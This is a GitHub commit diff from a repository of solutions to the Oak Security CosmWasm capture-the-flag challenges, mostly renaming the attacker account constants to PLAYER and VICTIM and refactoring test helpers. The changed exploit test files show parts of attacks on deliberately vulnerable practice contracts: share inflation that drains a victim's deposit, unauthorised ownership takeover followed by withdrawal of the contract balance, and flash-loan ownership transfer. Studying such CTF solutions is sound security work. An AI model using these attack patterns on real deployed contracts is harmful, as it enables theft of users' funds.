add PLAYER constant

minaminao · Jun 22, 2024 · 8182b3e · 8182b3e
1 parent 0c1e0a4
commit 8182b3e
Show file tree

Hide file tree

Showing 14 changed files with 54 additions and 40 deletions.
diff --git a/README.md b/README.md
@@ -615,7 +615,7 @@ Note
 | [Oak Security CosmWasm CTF: 4. Gram](src/OakSecurityCosmWasmCTF/04-Gram/)             | invariant, rounding error     |
 | [Oak Security CosmWasm CTF: 5. Draupnir](src/OakSecurityCosmWasmCTF/05-Draupnir/)     | missing return                |
 | [Oak Security CosmWasm CTF: 6. Hofund](src/OakSecurityCosmWasmCTF/06-Hofund/)         | flash loan, governance        |
-| Oak Security CosmWasm CTF: 7. Tyrfing                                                 |                               |
+| [Oak Security CosmWasm CTF: 7. Tyrfing](src/OakSecurityCosmWasmCTF/07-Tyrfing/)       | storage collision             |
 | Oak Security CosmWasm CTF: 8. Gjallarhorn                                             |                               |
 | Oak Security CosmWasm CTF: 9. Brisingamen                                             |                               |
 | Oak Security CosmWasm CTF: 10. Mistilteinn                                            |                               |

diff --git a/src/OakSecurityCosmWasmCTF/01-Mjolnir/src/contract.rs b/src/OakSecurityCosmWasmCTF/01-Mjolnir/src/contract.rs
@@ -6,7 +6,6 @@ use cosmwasm_std::{
 
 use crate::error::ContractError;
 use crate::msg::{ExecuteMsg, InstantiateMsg, QueryMsg};
-// これがステート
 use crate::state::{Lockup, LAST_ID, LOCKUPS};
 use cw_utils::must_pay;
 
@@ -24,7 +23,6 @@ pub fn instantiate(
     Ok(Response::new().add_attribute("action", "instantiate"))
 }
 
-// execute が entry point になり、deposit か withdraw が実行される
 #[cfg_attr(not(feature = "library"), entry_point)]
 pub fn execute(
     deps: DepsMut,

diff --git a/src/OakSecurityCosmWasmCTF/01-Mjolnir/src/exploit.rs b/src/OakSecurityCosmWasmCTF/01-Mjolnir/src/exploit.rs
@@ -4,17 +4,17 @@
 pub mod exploit {
     use crate::{
         contract::{DENOM, LOCK_PERIOD, MINIMUM_DEPOSIT_AMOUNT},
-        integration_tests::tests::{proper_instantiate, USER},
+        integration_tests::tests::{base_scenario, PLAYER},
         msg::ExecuteMsg,
     };
     use cosmwasm_std::{Addr, Uint128};
     use cw_multi_test::Executor;
 
     #[test]
     fn exploit() {
-        let (mut app, contract_addr) = proper_instantiate();
+        let (mut app, contract_addr) = base_scenario();
 
-        let player = Addr::unchecked(USER);
+        let player = Addr::unchecked(PLAYER);
 
         // fast forward 24 hrs
         app.update_block(|block| {

diff --git a/src/OakSecurityCosmWasmCTF/01-Mjolnir/src/integration_tests.rs b/src/OakSecurityCosmWasmCTF/01-Mjolnir/src/integration_tests.rs
@@ -18,6 +18,7 @@ pub mod tests {
     }
 
     pub const USER: &str = "user";
+    pub const PLAYER: &str = USER;
     pub const ADMIN: &str = "admin";
 
     pub fn proper_instantiate() -> (App, Addr) {
@@ -37,6 +38,23 @@ pub mod tests {
             )
             .unwrap();
 
+        (app, contract_addr)
+    }
+
+    pub fn mint_tokens(mut app: App, recipient: String, amount: Uint128) -> App {
+        app.sudo(cw_multi_test::SudoMsg::Bank(
+            cw_multi_test::BankSudo::Mint {
+                to_address: recipient.to_owned(),
+                amount: vec![coin(amount.u128(), DENOM)],
+            },
+        ))
+        .unwrap();
+        app
+    }
+
+    pub fn base_scenario() -> (App, Addr) {
+        let (mut app, contract_addr) = proper_instantiate();
+
         // mint funds to contract
         app = mint_tokens(
             app,
@@ -65,20 +83,9 @@ pub mod tests {
         (app, contract_addr)
     }
 
-    pub fn mint_tokens(mut app: App, recipient: String, amount: Uint128) -> App {
-        app.sudo(cw_multi_test::SudoMsg::Bank(
-            cw_multi_test::BankSudo::Mint {
-                to_address: recipient.to_owned(),
-                amount: vec![coin(amount.u128(), DENOM)],
-            },
-        ))
-        .unwrap();
-        app
-    }
-
     #[test]
     fn basic_flow() {
-        let (mut app, contract_addr) = proper_instantiate();
+        let (mut app, contract_addr) = base_scenario();
 
         let sender = Addr::unchecked(USER);
 

diff --git a/src/OakSecurityCosmWasmCTF/02-Gungnir/src/integration_tests.rs b/src/OakSecurityCosmWasmCTF/02-Gungnir/src/integration_tests.rs
@@ -18,6 +18,7 @@ pub mod tests {
     }
 
     pub const USER: &str = "user";
+    pub const PLAYER: &str = USER;
     pub const ADMIN: &str = "admin";
 
     pub fn proper_instantiate() -> (App, Addr) {

diff --git a/src/OakSecurityCosmWasmCTF/03-Laevateinn/contracts/proxy/src/exploit.rs b/src/OakSecurityCosmWasmCTF/03-Laevateinn/contracts/proxy/src/exploit.rs
@@ -2,7 +2,7 @@
 pub mod exploit {
     use crate::{
         contract::DENOM,
-        integration_tests::tests::{proper_instantiate, USER},
+        integration_tests::tests::{proper_instantiate, PLAYER},
     };
     use common::{flash_loan::ExecuteMsg as FlashLoanExecuteMsg, proxy::ExecuteMsg};
     use cosmwasm_std::{to_binary, Addr, Uint128};
@@ -13,7 +13,7 @@ pub mod exploit {
         let (mut app, proxy_contract, flash_loan_contract, _mock_arb_contract) =
             proper_instantiate();
 
-        let player = Addr::unchecked(USER);
+        let player = Addr::unchecked(PLAYER);
 
         let msg_transfer_owner = to_binary(&FlashLoanExecuteMsg::TransferOwner {
             new_owner: player.clone(),

diff --git a/src/OakSecurityCosmWasmCTF/03-Laevateinn/contracts/proxy/src/integration_tests.rs b/src/OakSecurityCosmWasmCTF/03-Laevateinn/contracts/proxy/src/integration_tests.rs
@@ -38,7 +38,7 @@ pub mod tests {
         Box::new(contract)
     }
 
-    pub const USER: &str = "user";
+    pub const PLAYER: &str = "player";
     pub const ADMIN: &str = "admin";
 
     pub fn proper_instantiate() -> (App, Addr, Addr, Addr) {

diff --git a/src/OakSecurityCosmWasmCTF/04-Gram/src/exploit.rs b/src/OakSecurityCosmWasmCTF/04-Gram/src/exploit.rs
@@ -2,7 +2,7 @@
 pub mod exploit {
     use crate::{
         contract::DENOM,
-        integration_tests::tests::{base_scenario, USER, USER2},
+        integration_tests::tests::{base_scenario, PLAYER, VICTIM},
         msg::{ExecuteMsg, QueryMsg},
         state::Balance,
     };
@@ -15,27 +15,27 @@ pub mod exploit {
 
         let (mut app, contract_addr) = base_scenario();
 
-        let attacker_addr = Addr::unchecked(USER);
-        let attacker_initial_balance = app
+        let player_addr = Addr::unchecked(PLAYER);
+        let player_initial_balance = app
             .wrap()
-            .query_balance(attacker_addr.clone(), DENOM)
+            .query_balance(player_addr.clone(), DENOM)
             .unwrap();
-        let victim_addr = Addr::unchecked(USER2);
+        let victim_addr = Addr::unchecked(VICTIM);
         let victim_initial_balance = app
             .wrap()
             .query_balance(victim_addr.clone(), DENOM)
             .unwrap();
 
         app.execute_contract(
-            attacker_addr.clone(),
+            player_addr.clone(),
             contract_addr.clone(),
             &ExecuteMsg::Mint {},
             &[coin(1, DENOM)],
         )
         .unwrap();
 
         app.send_tokens(
-            attacker_addr.clone(),
+            player_addr.clone(),
             contract_addr.clone(),
             &[coin(
                 (victim_initial_balance.amount / Uint128::new(2)).u128(),
@@ -57,13 +57,13 @@ pub mod exploit {
             .query_wasm_smart(
                 contract_addr.clone(),
                 &QueryMsg::UserBalance {
-                    address: attacker_addr.to_string(),
+                    address: player_addr.to_string(),
                 },
             )
             .unwrap();
 
         app.execute_contract(
-            attacker_addr.clone(),
+            player_addr.clone(),
             contract_addr.clone(),
             &ExecuteMsg::Burn {
                 shares: token_balance.amount,
@@ -72,8 +72,8 @@ pub mod exploit {
         )
         .unwrap();
 
-        let balance = app.wrap().query_balance(attacker_addr, DENOM).unwrap();
-        let profit = balance.amount - attacker_initial_balance.amount;
+        let balance = app.wrap().query_balance(player_addr, DENOM).unwrap();
+        let profit = balance.amount - player_initial_balance.amount;
         println!("Profit: {}", profit);
     }
 }
diff --git a/src/OakSecurityCosmWasmCTF/04-Gram/src/integration_tests.rs b/src/OakSecurityCosmWasmCTF/04-Gram/src/integration_tests.rs
@@ -19,6 +19,8 @@ pub mod tests {
 
     pub const USER: &str = "user";
     pub const USER2: &str = "user2";
+    pub const PLAYER: &str = USER;
+    pub const VICTIM: &str = USER2;
     pub const ADMIN: &str = "admin";
 
     pub fn proper_instantiate() -> (App, Addr) {

diff --git a/src/OakSecurityCosmWasmCTF/05-Draupnir/src/exploit.rs b/src/OakSecurityCosmWasmCTF/05-Draupnir/src/exploit.rs
@@ -1,35 +1,39 @@
 #[cfg(test)]
 pub mod exploit {
-    use crate::{contract::DENOM, integration_tests::tests::base_scenario, msg::ExecuteMsg};
+    use crate::{
+        contract::DENOM,
+        integration_tests::tests::{base_scenario, PLAYER},
+        msg::ExecuteMsg,
+    };
     use cosmwasm_std::{Addr, BankMsg, CosmosMsg, Uint128};
     use cw_multi_test::Executor;
 
     #[test]
     fn exploit() {
         let (mut app, contract_addr) = base_scenario();
 
-        let attacker = Addr::unchecked("attacker");
+        let player = Addr::unchecked(PLAYER);
 
         let initial_contract_balance = app
             .wrap()
             .query_balance(contract_addr.to_string(), DENOM)
             .unwrap();
 
         app.execute_contract(
-            attacker.clone(),
+            player.clone(),
             contract_addr.clone(),
             &ExecuteMsg::AcceptOwnership {},
             &[],
         )
         .unwrap();
 
         let msg = CosmosMsg::Bank(BankMsg::Send {
-            to_address: attacker.to_string(),
+            to_address: player.to_string(),
             amount: vec![initial_contract_balance],
         });
 
         app.execute_contract(
-            attacker,
+            player,
             contract_addr.clone(),
             &ExecuteMsg::OwnerAction { msg },
             &[],

diff --git a/src/OakSecurityCosmWasmCTF/05-Draupnir/src/integration_tests.rs b/src/OakSecurityCosmWasmCTF/05-Draupnir/src/integration_tests.rs
@@ -17,6 +17,7 @@ pub mod tests {
 
     pub const USER1: &str = "user1";
     pub const USER2: &str = "user2";
+    pub const PLAYER: &str = "player";
     pub const ADMIN: &str = "admin";
 
     pub fn proper_instantiate() -> (App, Addr) {

diff --git a/src/OakSecurityCosmWasmCTF/06-Hofund/src/exploit.rs b/src/OakSecurityCosmWasmCTF/06-Hofund/src/exploit.rs
@@ -2,7 +2,7 @@
 pub mod exploit {
     use crate::{
         integration_tests::tests::{
-            base_scenario, pseudo_flash_loan, ExecuteMsgs, ADMIN, USER1, VOTING_WINDOW,
+            base_scenario, pseudo_flash_loan, ExecuteMsgs, ADMIN, PLAYER, VOTING_WINDOW,
         },
         msg::{ExecuteMsg, QueryMsg},
         state::Config,
@@ -15,7 +15,7 @@ pub mod exploit {
     fn exploit() {
         let (mut app, contract_addr, token_addr) = base_scenario();
 
-        let player = Addr::unchecked(USER1);
+        let player = Addr::unchecked(PLAYER);
 
         app.execute_contract(
             player.clone(),

diff --git a/src/OakSecurityCosmWasmCTF/06-Hofund/src/integration_tests.rs b/src/OakSecurityCosmWasmCTF/06-Hofund/src/integration_tests.rs
@@ -27,6 +27,7 @@ pub mod tests {
     pub const USER1: &str = "user1";
     pub const USER2: &str = "user2";
     pub const ADMIN: &str = "admin";
+    pub const PLAYER: &str = "player";
     pub const VOTING_WINDOW: u64 = 10;
 
     pub fn proper_instantiate() -> (App, Addr, Addr) {

diff --git a/src/OakSecurityCosmWasmCTF/07-Tyrfing/src/exploit.rs b/src/OakSecurityCosmWasmCTF/07-Tyrfing/src/exploit.rs
@@ -6,7 +6,7 @@ pub mod exploit {
         msg::{ConfigQueryResponse, ExecuteMsg, QueryMsg},
     };
     use cosmwasm_std::{coin, Addr, BankMsg, CosmosMsg, Uint128};
-    use cw_multi_test::{Executor};
+    use cw_multi_test::Executor;
 
     #[test]
     fn exploit() {